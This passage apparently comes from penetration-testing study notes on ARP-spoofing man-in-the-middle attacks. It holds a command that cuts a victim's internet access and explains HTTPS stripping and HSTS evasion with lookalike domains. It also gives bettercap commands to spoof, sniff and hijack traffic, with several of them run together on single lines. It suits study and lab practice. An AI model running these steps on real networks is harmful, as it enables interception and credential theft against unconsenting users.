AnasAboreeda/Penetration-Testing-Study-Notes/client_side/MITM (arp spoofing).md

 By not opening forwarding, the victim loses internet access.

     sudo sysctl net.ipv4.ip_forward=0

+Bypassing https:
+To bypass https, the hacker must force the connection to use http.

+However, some sites are hsts enabled, which means that only https are allowed, thus a hacker must change the url name to a different url such as facebook.corn or wwww.sites.com.

+Bettercap provides easy-to-use tool for this.

+        bettercap
+        net.probe on # start looking for targets net.show # show all discovered devices in the network set arp.spoof.targets <target>
+        set arp.spoof.fullduplex <true> # spoof both the router and the victim arp.spoof on
+        net.sniff on # sniff for incoming packets hstshijack # hijack https and hsts by the methods above.

 ### Applications:
 Getting man in the middle allows dos attack, password sniffing, inject javascript in web browsers, backdoor files on the fly, etc.